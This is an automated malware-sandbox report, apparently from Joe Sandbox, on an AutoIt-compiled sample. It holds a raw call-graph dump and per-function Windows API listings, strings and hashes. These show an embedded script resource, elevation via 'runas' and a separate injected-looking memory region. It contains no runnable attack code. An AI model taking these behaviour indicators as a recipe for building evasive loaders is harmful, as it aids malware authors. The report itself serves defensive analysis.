96866->96785 96867->96785 96868->96785 96870 ea7474 96869->96870 96871 ea7469 96869->96871 96873 ea7554 96870->96873 96875 e3a961 22 API calls 96870->96875 97062 e3b567 39 API calls 96871->97062 96874 e4fddb 22 API calls 96873->96874 96914 ea76a4 96873->96914 96876 ea7587 96874->96876 96877 ea7495 96875->96877 96878 e4fe0b 22 API calls 96876->96878 96879 e3a961 22 API calls 96877->96879 96880 ea7598 96878->96880 96882 ea749e 96879->96882 96881 e36246 CloseHandle 96880->96881 96883 ea75a3 96881->96883 96884 e37510 53 API calls 96882->96884 96885 e3a961 22 API calls 96883->96885 96886 ea74aa 96884->96886 96887 ea75ab 96885->96887 97063 e3525f 22 API calls 96886->97063 96889 e36246 CloseHandle 96887->96889 96892 ea75b2 96889->96892 96890 ea74bf 96891 e36350 22 API calls 96890->96891 96893 ea74f2 96891->96893 97031 e37510 96892->97031 96895 ea754a 96893->96895 97064 e9d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 96893->97064 97066 e3b567 39 API calls 96895->97066 96898 e36246 CloseHandle 96901 ea75c8 96898->96901 96900 ea7502 96900->96895 96902 ea7506 96900->96902 97054 e35745 96901->97054 96903 e39cb3 22 API calls 96902->96903 96905 ea7513 96903->96905 97065 e9d2c1 26 API calls 96905->97065 96908 ea75ea 97067 e353de 27 API calls messages 96908->97067 96909 ea76de GetLastError 96910 ea76f7 96909->96910 97074 e36216 CloseHandle messages 96910->97074 96913 ea75f8 97068 e353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96913->97068 96914->96840 96915 ea751c 96915->96895 96917 ea7645 96918 e4fddb 22 API calls 96917->96918 96920 ea7679 96918->96920 96919 ea75ff 96919->96917 97069 e9ccff 96919->97069 96921 e3a961 22 API calls 96920->96921 96923 ea7686 96921->96923 96923->96914 97073 e9417d 22 API calls __fread_nolock 96923->97073 97081 ea98e3 96925->97081 96927 ea83ea 96927->96840 96929 e37510 53 API calls 96928->96929 96930 eaf126 96929->96930 97144 e39e90 96930->97144 96932 eaf136 96933 eaf15b 96932->96933 96934 e3ec40 207 API calls 96932->96934 96936 
eaf15f 96933->96936 97172 e39c6e 22 API calls 96933->97172 96934->96933 96936->96840 96938 e36250 96937->96938 96939 e3625f 96937->96939 96938->96840 96939->96938 96940 e36264 CloseHandle 96939->96940 96940->96938 97180 eb7f59 96941->97180 96943 eb959b 96943->96840 96945 e3a961 22 API calls 96944->96945 96946 ebe21b 96945->96946 96947 e37510 53 API calls 96946->96947 96948 ebe22a 96947->96948 96949 e36270 22 API calls 96948->96949 96950 ebe23d 96949->96950 96951 e37510 53 API calls 96950->96951 96952 ebe24a 96951->96952 96953 ebe262 96952->96953 96954 ebe2c7 96952->96954 97292 e3b567 39 API calls 96953->97292 96955 e37510 53 API calls 96954->96955 96957 ebe2cc 96955->96957 96959 ebe2d9 96957->96959 96960 ebe314 96957->96960 96958 ebe267 96958->96959 96962 ebe280 96958->96962 97295 e39c6e 22 API calls 96959->97295 96963 ebe32c 96960->96963 97296 e3b567 39 API calls 96960->97296 97293 e36d25 22 API calls __fread_nolock 96962->97293 96965 ebe345 96963->96965 97297 e3b567 39 API calls 96963->97297 96968 e3a8c7 22 API calls 96965->96968 96970 ebe35f 96968->96970 96969 ebe28d 96971 e36350 22 API calls 96969->96971 97273 e992c8 96970->97273 96973 ebe29b 96971->96973 97294 e36d25 22 API calls __fread_nolock 96973->97294 96975 ebe2b4 96976 e36350 22 API calls 96975->96976 96978 ebe2c2 96976->96978 96977 ebe2e6 96977->96840 97298 e362b5 22 API calls 96978->97298 96981 eb70db 96980->96981 96982 eb70f5 96980->96982 97313 ea359c 82 API calls __wsopen_s 96981->97313 97302 eb5689 96982->97302 96986 e3ec40 206 API calls 96987 eb7164 96986->96987 96988 eb71ff 96987->96988 96991 eb70ed 96987->96991 96993 eb71a6 96987->96993 96989 eb7253 96988->96989 96990 eb7205 96988->96990 96989->96991 96992 e37510 53 API calls 96989->96992 97314 ea1119 22 API calls 96990->97314 96991->96800 96994 eb7265 96992->96994 96998 ea0acc 22 API calls 96993->96998 96996 e3aec9 22 API calls 96994->96996 97000 eb7289 CharUpperBuffW 96996->97000 96997 eb7228 97315 e3a673 22 API calls 96997->97315 96999 eb71de 
96998->96999 97002 e41310 206 API calls 96999->97002 97003 eb72a3 97000->97003 97002->96991 97005 eb72aa 97003->97005 97006 eb72f6 97003->97006 97004 eb7230 97316 e3bf40 207 API calls 2 library calls 97004->97316 97309 ea0acc 97005->97309 97007 e37510 53 API calls 97006->97007 97009 eb72fe 97007->97009 97317 e4e300 23 API calls 97009->97317 97013 e41310 206 API calls 97013->96991 97014 eb7308 97014->96991 97015 e37510 53 API calls 97014->97015 97016 eb7323 97015->97016 97318 e3a673 22 API calls 97016->97318 97018 eb7333 97319 e3bf40 207 API calls 2 library calls 97018->97319 97020->96841 97021->96802 97022->96804 97023->96814 97024->96828 97025->96828 97026->96840 97027->96840 97028->96840 97029->96838 97030->96840 97032 e37525 97031->97032 97048 e37522 97031->97048 97033 e3755b 97032->97033 97034 e3752d 97032->97034 97037 e7500f 97033->97037 97038 e3756d 97033->97038 97046 e750f6 97033->97046 97075 e551c6 26 API calls 97034->97075 97042 e75088 97037->97042 97049 e4fe0b 22 API calls 97037->97049 97076 e4fb21 51 API calls 97038->97076 97039 e3753d 97044 e4fddb 22 API calls 97039->97044 97040 e7510e 97040->97040 97077 e4fb21 51 API calls 97042->97077 97045 e37547 97044->97045 97047 e39cb3 22 API calls 97045->97047 97078 e55183 26 API calls 97046->97078 97047->97048 97048->96898 97050 e75058 97049->97050 97051 e4fddb 22 API calls 97050->97051 97052 e7507f 97051->97052 97053 e39cb3 22 API calls 97052->97053 97053->97042 97055 e74035 97054->97055 97056 e3575c CreateFileW 97054->97056 97057 e7403b CreateFileW 97055->97057 97059 e3577b 97055->97059 97056->97059 97058 e74063 97057->97058 97057->97059 97079 e354c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97058->97079 97059->96908 97059->96909 97061 e7406e 97061->97059 97062->96870 97063->96890 97064->96900 97065->96915 97066->96873 97067->96913 97068->96919 97070 e9cd19 WriteFile 97069->97070 97071 e9cd0e 97069->97071 97070->96917 97080 e9cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97071->97080 

                                                      Control-flow Graph

                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00E3430D
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • GetCurrentProcess.KERNEL32(?,00ECCB64,00000000,?,?), ref: 00E34422
                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00E34429
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E34454
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E34466
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00E34474
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E3447B
                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00E344A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                      • API String ID: 3290436268-3101561225
                                                      • Opcode ID: af93d59bd1fe26f516c864465754c24b4ba35315859c810ef0830a5cde6ef1d8
                                                      • Instruction ID: 5451d6f3ec6a144b20ce3d5080327de9754e5d0141ac697deba5e5514165cc0f
                                                      • Opcode Fuzzy Hash: af93d59bd1fe26f516c864465754c24b4ba35315859c810ef0830a5cde6ef1d8
                                                      • Instruction Fuzzy Hash: F7A1C7B290A3CCDFC715C7B97C855D57FE47B26304F58A8A9E085B3A62D2305909FB22

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E350AA,?,?,00000000,00000000), ref: 00E342B2
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E350AA,?,?,00000000,00000000), ref: 00E342C9
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00E350AA,?,?,00000000,00000000,?,?,?,?,?,?,00E34F20), ref: 00E735BE
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00E350AA,?,?,00000000,00000000,?,?,?,?,?,?,00E34F20), ref: 00E735D3
                                                      • LockResource.KERNEL32(00E350AA,?,?,00E350AA,?,?,00000000,00000000,?,?,?,?,?,?,00E34F20,?), ref: 00E735E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: df67f0af05fc5b909bda587a1b350ecc939197c7b3ba9770308b70bc6f82fb06
                                                      • Instruction ID: 023ae680c8105431de7dea77177df59efe60064233e01d197e527507d15d093b
                                                      • Opcode Fuzzy Hash: df67f0af05fc5b909bda587a1b350ecc939197c7b3ba9770308b70bc6f82fb06
                                                      • Instruction Fuzzy Hash: 88119E70200700AFD7259B66DC48F277BFDEBC5B51F244169F416A62A0DB72E805CA20

                                                      Control-flow Graph

                                                      APIs
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E32B6B
                                                        • Part of subcall function 00E33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F01418,?,00E32E7F,?,?,?,00000000), ref: 00E33A78
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00EF2224), ref: 00E72C10
                                                      • ShellExecuteW.SHELL32(00000000,?,?,00EF2224), ref: 00E72C17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                      • String ID: runas
                                                      • API String ID: 448630720-4000483414
                                                      • Opcode ID: 32bc9e79901fce2a62e53891cd878592b4f6222e405ed4ca6223fddfddc94f77
                                                      • Instruction ID: 4a635627fb76f0097e960a6e663dd2c807dea595950028adfab900753ecd8271
                                                      • Opcode Fuzzy Hash: 32bc9e79901fce2a62e53891cd878592b4f6222e405ed4ca6223fddfddc94f77
                                                      • Instruction Fuzzy Hash: D311AC312083456AC708FF70D85ADBEBFE4AB91304F54742DF296720A3CF618A0AD712
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InputSleepStateTimetime
                                                      • String ID:
                                                      • API String ID: 4149333218-0
                                                      • Opcode ID: e27b2022d40d2d68ef31c7da14cc50b24be1332837657e24a3864901a3f3eba0
                                                      • Instruction ID: afb038934db3a71c00a7d9e5667bf94bdde0a90a0188deabf4b8d2b1995e04cc
                                                      • Opcode Fuzzy Hash: e27b2022d40d2d68ef31c7da14cc50b24be1332837657e24a3864901a3f3eba0
                                                      • Instruction Fuzzy Hash: 4042F230608341DFD729DF24DC48BAABBE0BF85308F14A55DE56AA7291D771E844CB92

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E32D07
                                                      • RegisterClassExW.USER32(00000030), ref: 00E32D31
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E32D42
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E32D5F
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E32D6F
                                                      • LoadIconW.USER32(000000A9), ref: 00E32D85
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E32D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 9b3de31a242a2e8e2f5e95ac605f7142b51bc464e4b84018d15f95674d1c8fd8
                                                      • Instruction ID: 24f62efc2144c8b0015bb3accea9a616d4e516d86973a5f9bf9b716f87cb6c22
                                                      • Opcode Fuzzy Hash: 9b3de31a242a2e8e2f5e95ac605f7142b51bc464e4b84018d15f95674d1c8fd8
                                                      • Instruction Fuzzy Hash: 2F21A0B5901318AFDB009FA5ED49B9DBBB4FB08700F10412AE615B62A0D7B245569F91

                                                      Control-flow Graph

                                                      • Function start: 00E7065B (interactive control-flow graph view not reproduced)
                                                      APIs
                                                        • Part of subcall function 00E7039A: CreateFileW.KERNELBASE(00000000,00000000,?,00E70704,?,?,00000000,?,00E70704,00000000,0000000C), ref: 00E703B7
                                                      • GetLastError.KERNEL32 ref: 00E7076F
                                                      • __dosmaperr.LIBCMT ref: 00E70776
                                                      • GetFileType.KERNELBASE(00000000), ref: 00E70782
                                                      • GetLastError.KERNEL32 ref: 00E7078C
                                                      • __dosmaperr.LIBCMT ref: 00E70795
                                                      • CloseHandle.KERNEL32(00000000), ref: 00E707B5
                                                      • CloseHandle.KERNEL32(?), ref: 00E708FF
                                                      • GetLastError.KERNEL32 ref: 00E70931
                                                      • __dosmaperr.LIBCMT ref: 00E70938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 8a522522add1e76a1bfab34d66de03d2ceafc9712bddbc67e029e9170328353c
                                                      • Instruction ID: 43eb7208c9d2a99d9ff96493280706b28443cdde7ef59bb8410730ffc8e24cec
                                                      • Opcode Fuzzy Hash: 8a522522add1e76a1bfab34d66de03d2ceafc9712bddbc67e029e9170328353c
                                                      • Instruction Fuzzy Hash: 51A13632A001498FDF19EF68D851BAE3BE1EB46324F14915DF819BB3A1CB319817DB91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00E33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F01418,?,00E32E7F,?,?,?,00000000), ref: 00E33A78
                                                        • Part of subcall function 00E33357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E33379
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E3356A
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E7318D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E731CE
                                                      • RegCloseKey.ADVAPI32(?), ref: 00E73210
                                                      • _wcslen.LIBCMT ref: 00E73277
                                                      • _wcslen.LIBCMT ref: 00E73286
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 98802146-2727554177
                                                      • Opcode ID: 259578bbcedbc402719ceb3b6bc1c50cea584b5e9a00565b0914ec57cae60f51
                                                      • Instruction ID: f775466c18d6affbbe1ae7313836f964a4a120d39efa63b125322c88da5d05bc
                                                      • Opcode Fuzzy Hash: 259578bbcedbc402719ceb3b6bc1c50cea584b5e9a00565b0914ec57cae60f51
                                                      • Instruction Fuzzy Hash: 8571E4714043049EC344DF69EC8ADABBBE8FF84340F50682EF589A31B1DB749A49DB61

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E32B8E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E32B9D
                                                      • LoadIconW.USER32(00000063), ref: 00E32BB3
                                                      • LoadIconW.USER32(000000A4), ref: 00E32BC5
                                                      • LoadIconW.USER32(000000A2), ref: 00E32BD7
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E32BEF
                                                      • RegisterClassExW.USER32(?), ref: 00E32C40
                                                        • Part of subcall function 00E32CD4: GetSysColorBrush.USER32(0000000F), ref: 00E32D07
                                                        • Part of subcall function 00E32CD4: RegisterClassExW.USER32(00000030), ref: 00E32D31
                                                        • Part of subcall function 00E32CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E32D42
                                                        • Part of subcall function 00E32CD4: InitCommonControlsEx.COMCTL32(?), ref: 00E32D5F
                                                        • Part of subcall function 00E32CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E32D6F
                                                        • Part of subcall function 00E32CD4: LoadIconW.USER32(000000A9), ref: 00E32D85
                                                        • Part of subcall function 00E32CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E32D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 0ec59d6ef4e6d37d6c076ef5bf996af3b5d66a28d72b77db009884ef64b8f425
                                                      • Instruction ID: 4f26902a68b631852a0db10fa0fae4e1acbbd742f97189c2185bf8b0d7f3bbf1
                                                      • Opcode Fuzzy Hash: 0ec59d6ef4e6d37d6c076ef5bf996af3b5d66a28d72b77db009884ef64b8f425
                                                      • Instruction Fuzzy Hash: E5211A70E00318AFDB109FA6EC59AAA7FF5FB48B50F14002AF504B67A0D7B14555EF90

                                                      Control-flow Graph

                                                      • Function start: 00E33170 (interactive control-flow graph view not reproduced)
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E3316A,?,?), ref: 00E331D8
                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00E3316A,?,?), ref: 00E33204
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E33227
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E3316A,?,?), ref: 00E33232
                                                      • CreatePopupMenu.USER32 ref: 00E33246
                                                      • PostQuitMessage.USER32(00000000), ref: 00E33267
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 08fd5d18d4efeac514ca328b2e7598d3bfd84aeb6421e7dc0aca0e92fd955f42
                                                      • Instruction ID: c44e2ca65a258e0d6253abcb2a0c4a8db98934938697a591c013adcf86d4dfc5
                                                      • Opcode Fuzzy Hash: 08fd5d18d4efeac514ca328b2e7598d3bfd84aeb6421e7dc0aca0e92fd955f42
                                                      • Instruction Fuzzy Hash: EA413B35600204ABDB141B789D0DFBA3E99F705348F14712AFA0AB61F2C7718E41E761

                                                      Control-flow Graph

                                                      • Function start: 014892F0 (interactive control-flow graph view not reproduced)
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014893C1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014895E7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction ID: f6f2f649f1f32eb807449dd1fee1b2282b63ab9598197d0643ed8e8651fdfb82
                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction Fuzzy Hash: CEA11C71E04209EBDF14DFA8C854BEEB7B5BF88708F20855AE101BB291C7759A41CF64

                                                      Control-flow Graph

                                                      • Function start: 00E32C63 (interactive control-flow graph view not reproduced)
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E32C91
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E32CB2
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E31CAD,?), ref: 00E32CC6
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E31CAD,?), ref: 00E32CCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: ac28bc46c7f0ad97c52f2643819f8830825e15a3f52f4c69ad8e0fa351f442f7
                                                      • Instruction ID: 3a42c09c4b68fda2bc1821765cb25e45bf7190b66d6eca71938d2003a65e3036
                                                      • Opcode Fuzzy Hash: ac28bc46c7f0ad97c52f2643819f8830825e15a3f52f4c69ad8e0fa351f442f7
                                                      • Instruction Fuzzy Hash: 15F0DA755403987AEB311727AC09E773EBDF7C6F50B10106EF904A25A0C6721855EAB0

                                                      Control-flow Graph

                                                      • Function start: 014890D0 (interactive control-flow graph view not reproduced)
                                                      APIs
                                                        • Part of subcall function 01488FC0: Sleep.KERNELBASE(000001F4), ref: 01488FD1
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014891E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: Q25JD1MADU
                                                      • API String ID: 2694422964-125274971
